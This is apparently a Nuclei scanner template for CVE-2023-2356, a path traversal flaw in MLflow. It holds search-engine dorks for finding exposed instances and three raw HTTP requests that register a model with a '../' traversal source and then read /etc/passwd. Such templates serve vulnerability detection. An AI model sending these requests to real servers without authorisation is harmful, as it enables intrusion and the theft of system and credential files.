id: CVE-2023-2356 info: name: Mlflow <2.3.0 - Local File Inclusion author: Co5mos severity: high description: | Relative Path Traversal in GitHub repository mlflow/mlflow prior to 2.3.1. impact: | Successful exploitation could allow an attacker to read sensitive files on the server. remediation: | Upgrade Mlflow to version 2.3.0 or above to mitigate the vulnerability. reference: - https://huntr.dev/bounties/7b5d130d-38eb-4133-8c7d-0dfc9a9d9896/ - https://nvd.nist.gov/vuln/detail/CVE-2023-2356 - https://github.com/mlflow/mlflow/commit/f73147496e05c09a8b83d95fb4f1bf86696c6342 - https://github.com/Ostorlab/KEV - https://github.com/Ostorlab/known_exploited_vulnerbilities_detectors classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-2356 cwe-id: CWE-23 epss-score: 0.01406 epss-percentile: 0.86426 cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: lfprojects product: mlflow shodan-query: http.title:"mlflow" fofa-query: - app="MLflow" - app="mlflow" - title="mlflow" google-query: intitle:"mlflow" tags: cve2023,cve,lfi,huntr,mlflow,oss,intrusive,lfprojects variables: str: "{{rand_base(6)}}" http: - raw: - | POST /api/2.0/mlflow/registered-models/create HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {"name": "{{str}}"} - | POST /api/2.0/mlflow/model-versions/create HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {"name": "{{str}}", "source": "file://{{Hostname}}/../../../../../../../"} - | GET /model-versions/get-artifact?path=etc/passwd&name={{str}}&version={{version}} HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: regex regex: - root:[x*]:0:0 - type: status status: - 200 extractors: - type: regex name: version group: 1 regex: - '"version": "([0-9.]+)",' internal: true part: body # digest: 490a00463044021f0a21f7d206dec98e8f87565781a99fedda197d776617f6d266fe245242061f022100ff34925e4f91bb9951803355f009dfc63d5d727adc5652223c2a61d58e324df5:922c64590222798bb761d5b6d8e72950